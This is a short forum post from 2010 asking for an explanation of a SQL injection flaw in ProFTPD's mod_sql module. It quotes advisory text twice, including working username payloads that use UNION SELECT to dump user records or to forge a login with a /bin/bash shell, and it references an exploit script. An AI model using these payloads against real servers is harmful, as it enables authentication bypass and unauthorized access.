ProFTPD 'mod_sql' Username SQL Injection Vulnerability
Posted: Tue Mar 09, 2010 4:49 pm
Hi...
Anyone can explain about this SQL Injection cording please......
Attackers can use standard tools to exploit this issue.
The following example input is available:
username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
password: 1
username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a
The following exploit is available:
* /data/vulnerabilities/exploits/33722.pl
Anyone can explain about this SQL Injection cording please......
Attackers can use standard tools to exploit this issue.
The following example input is available:
username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
password: 1
username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a
The following exploit is available:
* /data/vulnerabilities/exploits/33722.pl